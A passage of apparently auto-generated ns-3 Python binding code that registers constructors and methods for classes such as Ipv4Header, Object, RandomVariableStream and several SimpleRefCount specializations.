[constructor] cls.add_constructor([param('long int', 'v')]) ## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t(long long int v) [constructor] cls.add_constructor([param('long long int', 'v')]) ## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t(unsigned int v) [constructor] cls.add_constructor([param('unsigned int', 'v')]) ## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t(long unsigned int v) [constructor] cls.add_constructor([param('long unsigned int', 'v')]) ## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t(long long unsigned int v) [constructor] cls.add_constructor([param('long long unsigned int', 'v')]) ## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t(int64_t hi, uint64_t lo) [constructor] cls.add_constructor([param('int64_t', 'hi'), param('uint64_t', 'lo')]) ## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t(ns3::int64x64_t const & o) [copy constructor] cls.add_constructor([param('ns3::int64x64_t const &', 'o')]) ## int64x64-double.h (module 'core'): double ns3::int64x64_t::GetDouble() const [member function] cls.add_method('GetDouble', 'double', [], is_const=True) ## int64x64-double.h (module 'core'): int64_t ns3::int64x64_t::GetHigh() const [member function] cls.add_method('GetHigh', 'int64_t', [], is_const=True) ## int64x64-double.h (module 'core'): uint64_t ns3::int64x64_t::GetLow() const [member function] cls.add_method('GetLow', 'uint64_t', [], is_const=True) ## int64x64-double.h (module 'core'): static ns3::int64x64_t ns3::int64x64_t::Invert(uint64_t v) [member function] cls.add_method('Invert', 'ns3::int64x64_t', [param('uint64_t', 'v')], is_static=True) ## int64x64-double.h (module 'core'): void ns3::int64x64_t::MulByInvert(ns3::int64x64_t const & o) [member function] cls.add_method('MulByInvert', 'void', [param('ns3::int64x64_t const &', 'o')]) ## int64x64-double.h (module 'core'): ns3::int64x64_t::implementation [variable] 
    cls.add_static_attribute('implementation', 'ns3::int64x64_t::impl_type const', is_const=True)
    return

def register_Ns3Chunk_methods(root_module, cls):
    """Register Python bindings for the methods of the C++ class ns3::Chunk.

    NOTE(review): this file looks like PyBindGen-generated ns-3 binding code;
    the ``##`` comments are the generator's record of the wrapped C++ signatures.
    """
    ## chunk.h (module 'network'): ns3::Chunk::Chunk() [constructor]
    cls.add_constructor([])
    ## chunk.h (module 'network'): ns3::Chunk::Chunk(ns3::Chunk const & arg0) [copy constructor]
    cls.add_constructor([param('ns3::Chunk const &', 'arg0')])
    ## chunk.h (module 'network'): uint32_t ns3::Chunk::Deserialize(ns3::Buffer::Iterator start) [member function]
    cls.add_method('Deserialize', 'uint32_t', [param('ns3::Buffer::Iterator', 'start')], is_pure_virtual=True, is_virtual=True)
    ## chunk.h (module 'network'): static ns3::TypeId ns3::Chunk::GetTypeId() [member function]
    cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True)
    ## chunk.h (module 'network'): void ns3::Chunk::Print(std::ostream & os) const [member function]
    cls.add_method('Print', 'void', [param('std::ostream &', 'os')], is_pure_virtual=True, is_const=True, is_virtual=True)
    return

def register_Ns3Header_methods(root_module, cls):
    """Register Python bindings for the methods of the C++ class ns3::Header."""
    # Expose operator<< so wrapped headers are printable from Python.
    cls.add_output_stream_operator()
    ## header.h (module 'network'): ns3::Header::Header() [constructor]
    cls.add_constructor([])
    ## header.h (module 'network'): ns3::Header::Header(ns3::Header const & arg0) [copy constructor]
    cls.add_constructor([param('ns3::Header const &', 'arg0')])
    ## header.h (module 'network'): uint32_t ns3::Header::Deserialize(ns3::Buffer::Iterator start) [member function]
    cls.add_method('Deserialize', 'uint32_t', [param('ns3::Buffer::Iterator', 'start')], is_pure_virtual=True, is_virtual=True)
    ## header.h (module 'network'): uint32_t ns3::Header::GetSerializedSize() const [member function]
    cls.add_method('GetSerializedSize', 'uint32_t', [], is_pure_virtual=True, is_const=True, is_virtual=True)
    ## header.h (module 'network'): static ns3::TypeId ns3::Header::GetTypeId() [member function]
    cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True)
    ## header.h (module 'network'): void ns3::Header::Print(std::ostream & os) const [member function]
    cls.add_method('Print', 'void', [param('std::ostream &', 'os')], is_pure_virtual=True, is_const=True, is_virtual=True)
    ## header.h (module 'network'): void ns3::Header::Serialize(ns3::Buffer::Iterator start) const [member function]
    cls.add_method('Serialize', 'void', [param('ns3::Buffer::Iterator', 'start')], is_pure_virtual=True, is_const=True, is_virtual=True)
    return

def register_Ns3Ipv4Header_methods(root_module, cls):
    """Register Python bindings for the methods of the C++ class ns3::Ipv4Header."""
    ## ipv4-header.h (module 'internet'): ns3::Ipv4Header::Ipv4Header(ns3::Ipv4Header const & arg0) [copy constructor]
    cls.add_constructor([param('ns3::Ipv4Header const &', 'arg0')])
    ## ipv4-header.h (module 'internet'): ns3::Ipv4Header::Ipv4Header() [constructor]
    cls.add_constructor([])
    ## ipv4-header.h (module 'internet'): uint32_t ns3::Ipv4Header::Deserialize(ns3::Buffer::Iterator start) [member function]
    cls.add_method('Deserialize', 'uint32_t', [param('ns3::Buffer::Iterator', 'start')], is_virtual=True)
    ## ipv4-header.h (module 'internet'): std::string ns3::Ipv4Header::DscpTypeToString(ns3::Ipv4Header::DscpType dscp) const [member function]
    cls.add_method('DscpTypeToString', 'std::string', [param('ns3::Ipv4Header::DscpType', 'dscp')], is_const=True)
    ## ipv4-header.h (module 'internet'): std::string ns3::Ipv4Header::EcnTypeToString(ns3::Ipv4Header::EcnType ecn) const [member function]
    cls.add_method('EcnTypeToString', 'std::string', [param('ns3::Ipv4Header::EcnType', 'ecn')], is_const=True)
    ## ipv4-header.h (module 'internet'): void ns3::Ipv4Header::EnableChecksum() [member function]
    cls.add_method('EnableChecksum', 'void', [])
    ## ipv4-header.h (module 'internet'): ns3::Ipv4Address ns3::Ipv4Header::GetDestination() const [member function]
    cls.add_method('GetDestination', 'ns3::Ipv4Address', [], is_const=True)
    ## ipv4-header.h (module 'internet'): ns3::Ipv4Header::DscpType ns3::Ipv4Header::GetDscp() const [member function]
    cls.add_method('GetDscp', 'ns3::Ipv4Header::DscpType', [], is_const=True)
    ## ipv4-header.h (module 'internet'): ns3::Ipv4Header::EcnType ns3::Ipv4Header::GetEcn() const [member function]
    cls.add_method('GetEcn', 'ns3::Ipv4Header::EcnType', [], is_const=True)
    ## ipv4-header.h (module 'internet'): uint16_t ns3::Ipv4Header::GetFragmentOffset() const [member function]
    cls.add_method('GetFragmentOffset', 'uint16_t', [], is_const=True)
    ## ipv4-header.h (module 'internet'): uint16_t ns3::Ipv4Header::GetIdentification() const [member function]
    cls.add_method('GetIdentification', 'uint16_t', [], is_const=True)
    ## ipv4-header.h (module 'internet'): ns3::TypeId ns3::Ipv4Header::GetInstanceTypeId() const [member function]
    cls.add_method('GetInstanceTypeId', 'ns3::TypeId', [], is_const=True, is_virtual=True)
    ## ipv4-header.h (module 'internet'): uint16_t ns3::Ipv4Header::GetPayloadSize() const [member function]
    cls.add_method('GetPayloadSize', 'uint16_t', [], is_const=True)
    ## ipv4-header.h (module 'internet'): uint8_t ns3::Ipv4Header::GetProtocol() const [member function]
    cls.add_method('GetProtocol', 'uint8_t', [], is_const=True)
    ## ipv4-header.h (module 'internet'): uint32_t ns3::Ipv4Header::GetSerializedSize() const [member function]
    cls.add_method('GetSerializedSize', 'uint32_t', [], is_const=True, is_virtual=True)
    ## ipv4-header.h (module 'internet'): ns3::Ipv4Address ns3::Ipv4Header::GetSource() const [member function]
    cls.add_method('GetSource', 'ns3::Ipv4Address', [], is_const=True)
    ## ipv4-header.h (module 'internet'): uint8_t ns3::Ipv4Header::GetTos() const [member function]
    cls.add_method('GetTos', 'uint8_t', [], is_const=True)
    ## ipv4-header.h (module 'internet'): uint8_t ns3::Ipv4Header::GetTtl() const [member function]
    cls.add_method('GetTtl', 'uint8_t', [], is_const=True)
    ## ipv4-header.h (module 'internet'): static ns3::TypeId ns3::Ipv4Header::GetTypeId() [member function]
    cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True)
    ## ipv4-header.h (module 'internet'): bool ns3::Ipv4Header::IsChecksumOk() const [member function]
    cls.add_method('IsChecksumOk', 'bool', [], is_const=True)
    ## ipv4-header.h (module 'internet'): bool ns3::Ipv4Header::IsDontFragment() const [member function]
    cls.add_method('IsDontFragment', 'bool', [], is_const=True)
    ## ipv4-header.h (module 'internet'): bool ns3::Ipv4Header::IsLastFragment() const [member function]
    cls.add_method('IsLastFragment', 'bool', [], is_const=True)
    ## ipv4-header.h (module 'internet'): void ns3::Ipv4Header::Print(std::ostream & os) const [member function]
    cls.add_method('Print', 'void', [param('std::ostream &', 'os')], is_const=True, is_virtual=True)
    ## ipv4-header.h (module 'internet'): void ns3::Ipv4Header::Serialize(ns3::Buffer::Iterator start) const [member function]
    cls.add_method('Serialize', 'void', [param('ns3::Buffer::Iterator', 'start')], is_const=True, is_virtual=True)
    ## ipv4-header.h (module 'internet'): void ns3::Ipv4Header::SetDestination(ns3::Ipv4Address destination) [member function]
    cls.add_method('SetDestination', 'void', [param('ns3::Ipv4Address', 'destination')])
    ## ipv4-header.h (module 'internet'): void ns3::Ipv4Header::SetDontFragment() [member function]
    cls.add_method('SetDontFragment', 'void', [])
    ## ipv4-header.h (module 'internet'): void ns3::Ipv4Header::SetDscp(ns3::Ipv4Header::DscpType dscp) [member function]
    cls.add_method('SetDscp', 'void', [param('ns3::Ipv4Header::DscpType', 'dscp')])
    ## ipv4-header.h (module 'internet'): void ns3::Ipv4Header::SetEcn(ns3::Ipv4Header::EcnType ecn) [member function]
    cls.add_method('SetEcn', 'void', [param('ns3::Ipv4Header::EcnType', 'ecn')])
    ## ipv4-header.h (module 'internet'): void ns3::Ipv4Header::SetFragmentOffset(uint16_t offsetBytes) [member function]
    cls.add_method('SetFragmentOffset', 'void', [param('uint16_t', 'offsetBytes')])
    ## ipv4-header.h (module 'internet'): void ns3::Ipv4Header::SetIdentification(uint16_t identification) [member function]
    cls.add_method('SetIdentification', 'void', [param('uint16_t', 'identification')])
    ## ipv4-header.h (module 'internet'): void ns3::Ipv4Header::SetLastFragment() [member function]
    cls.add_method('SetLastFragment', 'void', [])
    ## ipv4-header.h (module 'internet'): void ns3::Ipv4Header::SetMayFragment() [member function]
    cls.add_method('SetMayFragment', 'void', [])
    ## ipv4-header.h (module 'internet'): void ns3::Ipv4Header::SetMoreFragments() [member function]
    cls.add_method('SetMoreFragments', 'void', [])
    ## ipv4-header.h (module 'internet'): void ns3::Ipv4Header::SetPayloadSize(uint16_t size) [member function]
    cls.add_method('SetPayloadSize', 'void', [param('uint16_t', 'size')])
    ## ipv4-header.h (module 'internet'): void ns3::Ipv4Header::SetProtocol(uint8_t num) [member function]
    cls.add_method('SetProtocol', 'void', [param('uint8_t', 'num')])
    ## ipv4-header.h (module 'internet'): void ns3::Ipv4Header::SetSource(ns3::Ipv4Address source) [member function]
    cls.add_method('SetSource', 'void', [param('ns3::Ipv4Address', 'source')])
    ## ipv4-header.h (module 'internet'): void ns3::Ipv4Header::SetTos(uint8_t tos) [member function]
    cls.add_method('SetTos', 'void', [param('uint8_t', 'tos')])
    ## ipv4-header.h (module 'internet'): void ns3::Ipv4Header::SetTtl(uint8_t ttl) [member function]
    cls.add_method('SetTtl', 'void', [param('uint8_t', 'ttl')])
    return

def register_Ns3Object_methods(root_module, cls):
    """Register Python bindings for the methods of the C++ class ns3::Object."""
    ## object.h (module 'core'): ns3::Object::Object() [constructor]
    cls.add_constructor([])
    ## object.h (module 'core'): void ns3::Object::AggregateObject(ns3::Ptr<ns3::Object> other) [member function]
    cls.add_method('AggregateObject', 'void', [param('ns3::Ptr< ns3::Object >', 'other')])
    ## object.h (module 'core'): void ns3::Object::Dispose() [member function]
    cls.add_method('Dispose', 'void', [])
    ## object.h (module 'core'): ns3::Object::AggregateIterator ns3::Object::GetAggregateIterator() const [member function]
    cls.add_method('GetAggregateIterator', 'ns3::Object::AggregateIterator', [], is_const=True)
    ## object.h (module 'core'): ns3::TypeId ns3::Object::GetInstanceTypeId() const [member function]
    cls.add_method('GetInstanceTypeId', 'ns3::TypeId', [], is_const=True, is_virtual=True)
    ## object.h (module 'core'): static ns3::TypeId ns3::Object::GetTypeId() [member function]
    cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True)
    ## object.h (module 'core'): void ns3::Object::Initialize() [member function]
    cls.add_method('Initialize', 'void', [])
    ## object.h (module 'core'): bool ns3::Object::IsInitialized() const [member function]
    cls.add_method('IsInitialized', 'bool', [], is_const=True)
    # The remaining members are protected in C++ and wrapped as such.
    ## object.h (module 'core'): ns3::Object::Object(ns3::Object const & o) [copy constructor]
    cls.add_constructor([param('ns3::Object const &', 'o')], visibility='protected')
    ## object.h (module 'core'): void ns3::Object::DoDispose() [member function]
    cls.add_method('DoDispose', 'void', [], visibility='protected', is_virtual=True)
    ## object.h (module 'core'): void ns3::Object::DoInitialize() [member function]
    cls.add_method('DoInitialize', 'void', [], visibility='protected', is_virtual=True)
    ## object.h (module 'core'): void ns3::Object::NotifyNewAggregate() [member function]
    cls.add_method('NotifyNewAggregate', 'void', [], visibility='protected', is_virtual=True)
    return

def register_Ns3ObjectAggregateIterator_methods(root_module, cls):
    """Register Python bindings for the methods of ns3::Object::AggregateIterator."""
    ## object.h (module 'core'): ns3::Object::AggregateIterator::AggregateIterator(ns3::Object::AggregateIterator const & arg0) [copy constructor]
    cls.add_constructor([param('ns3::Object::AggregateIterator const &', 'arg0')])
    ## object.h (module 'core'): ns3::Object::AggregateIterator::AggregateIterator() [constructor]
    cls.add_constructor([])
    ## object.h (module 'core'): bool ns3::Object::AggregateIterator::HasNext() const [member function]
    cls.add_method('HasNext', 'bool', [], is_const=True)
    ## object.h (module 'core'): ns3::Ptr<ns3::Object const> ns3::Object::AggregateIterator::Next() [member function]
    cls.add_method('Next', 'ns3::Ptr< ns3::Object const >', [])
    return

def register_Ns3RandomVariableStream_methods(root_module, cls):
    """Register Python bindings for the methods of the C++ class ns3::RandomVariableStream."""
    ## random-variable-stream.h (module 'core'): static ns3::TypeId ns3::RandomVariableStream::GetTypeId() [member function]
    cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True)
    ## random-variable-stream.h (module 'core'): ns3::RandomVariableStream::RandomVariableStream() [constructor]
    cls.add_constructor([])
    ## random-variable-stream.h (module 'core'): void ns3::RandomVariableStream::SetStream(int64_t stream) [member function]
    cls.add_method('SetStream', 'void', [param('int64_t', 'stream')])
    ## random-variable-stream.h (module 'core'): int64_t ns3::RandomVariableStream::GetStream() const [member function]
    cls.add_method('GetStream', 'int64_t', [], is_const=True)
    ## random-variable-stream.h (module 'core'): void ns3::RandomVariableStream::SetAntithetic(bool isAntithetic) [member function]
    cls.add_method('SetAntithetic', 'void', [param('bool', 'isAntithetic')])
    ## random-variable-stream.h (module 'core'): bool ns3::RandomVariableStream::IsAntithetic() const [member function]
    cls.add_method('IsAntithetic', 'bool', [], is_const=True)
    ## random-variable-stream.h (module 'core'): double ns3::RandomVariableStream::GetValue() [member function]
    cls.add_method('GetValue', 'double', [], is_pure_virtual=True, is_virtual=True)
    ## random-variable-stream.h (module 'core'): uint32_t ns3::RandomVariableStream::GetInteger() [member function]
    cls.add_method('GetInteger', 'uint32_t', [], is_pure_virtual=True, is_virtual=True)
    ## random-variable-stream.h (module 'core'): ns3::RngStream * ns3::RandomVariableStream::Peek() const [member function]
    cls.add_method('Peek', 'ns3::RngStream *', [], is_const=True, visibility='protected')
    return

def register_Ns3SequentialRandomVariable_methods(root_module, cls):
    """Register Python bindings for the methods of the C++ class ns3::SequentialRandomVariable."""
    ## random-variable-stream.h (module 'core'): static ns3::TypeId ns3::SequentialRandomVariable::GetTypeId() [member function]
    cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True)
    ## random-variable-stream.h (module 'core'): ns3::SequentialRandomVariable::SequentialRandomVariable() [constructor]
    cls.add_constructor([])
    ## random-variable-stream.h (module 'core'): double ns3::SequentialRandomVariable::GetMin() const [member function]
    cls.add_method('GetMin', 'double', [], is_const=True)
    ## random-variable-stream.h (module 'core'): double ns3::SequentialRandomVariable::GetMax() const [member function]
    cls.add_method('GetMax', 'double', [], is_const=True)
    ## random-variable-stream.h (module 'core'): ns3::Ptr<ns3::RandomVariableStream> ns3::SequentialRandomVariable::GetIncrement() const [member function]
    cls.add_method('GetIncrement', 'ns3::Ptr< ns3::RandomVariableStream >', [], is_const=True)
    ## random-variable-stream.h (module 'core'): uint32_t ns3::SequentialRandomVariable::GetConsecutive() const [member function]
    cls.add_method('GetConsecutive', 'uint32_t', [], is_const=True)
    ## random-variable-stream.h (module 'core'): double ns3::SequentialRandomVariable::GetValue() [member function]
    cls.add_method('GetValue', 'double', [], is_virtual=True)
    ## random-variable-stream.h (module 'core'): uint32_t ns3::SequentialRandomVariable::GetInteger() [member function]
    cls.add_method('GetInteger', 'uint32_t', [], is_virtual=True)
    return

def register_Ns3SimpleRefCount__Ns3AttributeAccessor_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeAccessor__gt___methods(root_module, cls):
    """Register bindings for the ns3::SimpleRefCount< ns3::AttributeAccessor > specialization."""
    ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> >::SimpleRefCount() [constructor]
    cls.add_constructor([])
    ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> >::SimpleRefCount(ns3::SimpleRefCount<ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> > const & o) [copy constructor]
    cls.add_constructor([param('ns3::SimpleRefCount< ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter< ns3::AttributeAccessor > > const &', 'o')])
    ## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> >::Cleanup() [member function]
    cls.add_method('Cleanup', 'void', [], is_static=True)
    return

def register_Ns3SimpleRefCount__Ns3AttributeChecker_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeChecker__gt___methods(root_module, cls):
    """Register bindings for the ns3::SimpleRefCount< ns3::AttributeChecker > specialization."""
    ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> >::SimpleRefCount() [constructor]
    cls.add_constructor([])
    ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> >::SimpleRefCount(ns3::SimpleRefCount<ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> > const & o) [copy constructor]
    cls.add_constructor([param('ns3::SimpleRefCount< ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter< ns3::AttributeChecker > > const &', 'o')])
    ## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> >::Cleanup() [member function]
    cls.add_method('Cleanup', 'void', [], is_static=True)
    return

def register_Ns3SimpleRefCount__Ns3AttributeValue_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeValue__gt___methods(root_module, cls):
    """Register bindings for the ns3::SimpleRefCount< ns3::AttributeValue > specialization."""
    ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> >::SimpleRefCount() [constructor]
    cls.add_constructor([])
    ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> >::SimpleRefCount(ns3::SimpleRefCount<ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> > const & o) [copy constructor]
    cls.add_constructor([param('ns3::SimpleRefCount< ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter< ns3::AttributeValue > > const &', 'o')])
    ## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> >::Cleanup() [member function]
    cls.add_method('Cleanup', 'void', [], is_static=True)
    return

def register_Ns3SimpleRefCount__Ns3CallbackImplBase_Ns3Empty_Ns3DefaultDeleter__lt__ns3CallbackImplBase__gt___methods(root_module, cls):
    """Register bindings for the ns3::SimpleRefCount< ns3::CallbackImplBase > specialization."""
    ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> >::SimpleRefCount() [constructor]
    cls.add_constructor([])
    ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> >::SimpleRefCount(ns3::SimpleRefCount<ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> > const & o) [copy constructor]
    cls.add_constructor([param('ns3::SimpleRefCount< ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter< ns3::CallbackImplBase > > const &', 'o')])
    ## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> >::Cleanup() [member function]
    cls.add_method('Cleanup', 'void', [], is_static=True)
    return

def register_Ns3SimpleRefCount__Ns3EventImpl_Ns3Empty_Ns3DefaultDeleter__lt__ns3EventImpl__gt___methods(root_module, cls):
    """Register bindings for the ns3::SimpleRefCount< ns3::EventImpl > specialization."""
    ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::EventImpl, ns3::empty, ns3::DefaultDeleter<ns3::EventImpl> >::SimpleRefCount() [constructor]
    cls.add_constructor([])
    ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::EventImpl, ns3::empty, ns3::DefaultDeleter<ns3::EventImpl> >::SimpleRefCount(ns3::SimpleRefCount<ns3::EventImpl, ns3::empty, ns3::DefaultDeleter<ns3::EventImpl> > const & o) [copy constructor]
    cls.add_constructor([param('ns3::SimpleRefCount< ns3::EventImpl, ns3::empty, ns3::DefaultDeleter< ns3::EventImpl > > const &', 'o')])
    ## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::EventImpl, ns3::empty, ns3::DefaultDeleter<ns3::EventImpl> >::Cleanup() [member function]
    cls.add_method('Cleanup', 'void', [], is_static=True)
    return

def register_Ns3SimpleRefCount__Ns3HashImplementation_Ns3Empty_Ns3DefaultDeleter__lt__ns3HashImplementation__gt___methods(root_module, cls):
    """Register bindings for the ns3::SimpleRefCount< ns3::Hash::Implementation > specialization."""
    ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Hash::Implementation, ns3::empty, ns3::DefaultDeleter<ns3::Hash::Implementation> >::SimpleRefCount() [constructor]
    cls.add_constructor([])
    ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Hash::Implementation, ns3::empty, ns3::DefaultDeleter<ns3::Hash::Implementation> >::SimpleRefCount(ns3::SimpleRefCount<ns3::Hash::Implementation, ns3::empty, ns3::DefaultDeleter<ns3::Hash::Implementation> > const & o) [copy constructor]
    cls.add_constructor([param('ns3::SimpleRefCount< ns3::Hash::Implementation, ns3::empty, ns3::DefaultDeleter< ns3::Hash::Implementation > > const &', 'o')])
    ## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::Hash::Implementation, ns3::empty, ns3::DefaultDeleter<ns3::Hash::Implementation> >::Cleanup() [member function]
    cls.add_method('Cleanup', 'void', [], is_static=True)
    return

def register_Ns3SimpleRefCount__Ns3Ipv4MulticastRoute_Ns3Empty_Ns3DefaultDeleter__lt__ns3Ipv4MulticastRoute__gt___methods(root_module, cls):
    """Register bindings for the ns3::SimpleRefCount< ns3::Ipv4MulticastRoute > specialization."""
    ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Ipv4MulticastRoute, ns3::empty, ns3::DefaultDeleter<ns3::Ipv4MulticastRoute> >::SimpleRefCount() [constructor]
    cls.add_constructor([])
    ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Ipv4MulticastRoute, ns3::empty, ns3::DefaultDeleter<ns3::Ipv4MulticastRoute> >::SimpleRefCount(ns3::SimpleRefCount<ns3::Ipv4MulticastRoute, ns3::empty, ns3::DefaultDeleter<ns3::Ipv4MulticastRoute> > const & o) [copy constructor]
    cls.add_constructor([param('ns3::SimpleRefCount< ns3::Ipv4MulticastRoute, ns3::empty, ns3::DefaultDeleter< ns3::Ipv4MulticastRoute > > const &', 'o')])
    ## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::Ipv4MulticastRoute, ns3::empty, ns3::DefaultDeleter<ns3::Ipv4MulticastRoute> >::Cleanup() [member function]
    cls.add_method('Cleanup', 'void', [], is_static=True)
    return

def register_Ns3SimpleRefCount__Ns3Ipv4Route_Ns3Empty_Ns3DefaultDeleter__lt__ns3Ipv4Route__gt___methods(root_module, cls):
    """Register bindings for the ns3::SimpleRefCount< ns3::Ipv4Route > specialization."""
    ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Ipv4Route, ns3::empty, ns3::DefaultDeleter<ns3::Ipv4Route> >::SimpleRefCount() [constructor]
    cls.add_constructor([])
    ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Ipv4Route, ns3::empty, ns3::DefaultDeleter<ns3::Ipv4Route> >::SimpleRefCount(ns3::SimpleRefCount<ns3::Ipv4Route, ns3::empty, ns3::DefaultDeleter<ns3::Ipv4Route> > const & o) [copy constructor]
    cls.add_constructor([param('ns3::SimpleRefCount< ns3::Ipv4Route, ns3::empty, ns3::DefaultDeleter< ns3::Ipv4Route > > const &', 'o')])
    ## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::Ipv4Route, ns3::empty, ns3::DefaultDeleter<ns3::Ipv4Route> >::Cleanup() [member function]
    cls.add_method('Cleanup', 'void', [], is_static=True)
    return

def register_Ns3SimpleRefCount__Ns3NetDeviceQueue_Ns3Empty_Ns3DefaultDeleter__lt__ns3NetDeviceQueue__gt___methods(root_module, cls):
    """Register bindings for the ns3::SimpleRefCount< ns3::NetDeviceQueue > specialization."""
    ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::NetDeviceQueue, ns3::empty, ns3::DefaultDeleter<ns3::NetDeviceQueue> >::SimpleRefCount() [constructor]
    cls.add_constructor([])
    ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::NetDeviceQueue, ns3::empty, ns3::DefaultDeleter<ns3::NetDeviceQueue> >::SimpleRefCount(ns3::SimpleRefCount<ns3::NetDeviceQueue, ns3::empty, ns3::DefaultDeleter<ns3::NetDeviceQueue> > const & o) [copy constructor]
    cls.add_constructor([param('ns3::SimpleRefCount< ns3::NetDeviceQueue, ns3::empty, ns3::DefaultDeleter< ns3::NetDeviceQueue > > const &', 'o')])
    ## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::NetDeviceQueue, ns3::empty, ns3::DefaultDeleter<ns3::NetDeviceQueue> >::Cleanup() [member function]
    cls.add_method('Cleanup', 'void', [], is_static=True)
    return

def register_Ns3SimpleRefCount__Ns3NixVector_Ns3Empty_Ns3DefaultDeleter__lt__ns3NixVector__gt___methods(root_module, cls):
    """Register bindings for the ns3::SimpleRefCount< ns3::NixVector > specialization."""
    ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::NixVector, ns3::empty, ns3::DefaultDeleter<ns3::NixVector> >::SimpleRefCount() [constructor]
    cls.add_constructor([])
    ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::NixVector, ns3::empty, ns3::DefaultDeleter<ns3::NixVector> >::SimpleRefCount(ns3::SimpleRefCount<ns3::NixVector, ns3::empty, ns3::DefaultDeleter<ns3::NixVector> > const & o) [copy constructor]
    cls.add_constructor([param('ns3::SimpleRefCount< ns3::NixVector, ns3::empty, ns3::DefaultDeleter< ns3::NixVector > > const &', 'o')])
    ## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::NixVector, ns3::empty, ns3::DefaultDeleter<ns3::NixVector> >::Cleanup() [member function]
    cls.add_method('Cleanup', 'void', [], is_static=True)
    return

def register_Ns3SimpleRefCount__Ns3OutputStreamWrapper_Ns3Empty_Ns3DefaultDeleter__lt__ns3OutputStreamWrapper__gt___methods(root_module, cls):
    """Register bindings for the ns3::SimpleRefCount< ns3::OutputStreamWrapper > specialization."""
    ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::OutputStreamWrapper, ns3::empty, ns3::DefaultDeleter<ns3::OutputStreamWrapper> >::SimpleRefCount() [constructor]
    cls.add_constructor([])
    ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::OutputStreamWrapper, ns3::empty, ns3::DefaultDeleter<ns3::OutputStreamWrapper> >::SimpleRefCount(ns3::SimpleRefCount<ns3::OutputStreamWrapper, ns3::empty, ns3::DefaultDeleter<ns3::OutputStreamWrapper> > const & o) [copy constructor]
    cls.add_constructor([param('ns3::SimpleRefCount< ns3::OutputStreamWrapper, ns3::empty, ns3::DefaultDeleter< ns3::OutputStreamWrapper > > const &', 'o')])
    ## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::OutputStreamWrapper, ns3::empty, ns3::DefaultDeleter<ns3::OutputStreamWrapper> >::Cleanup() [member function]
    cls.add_method('Cleanup', 'void', [], is_static=True)
    return

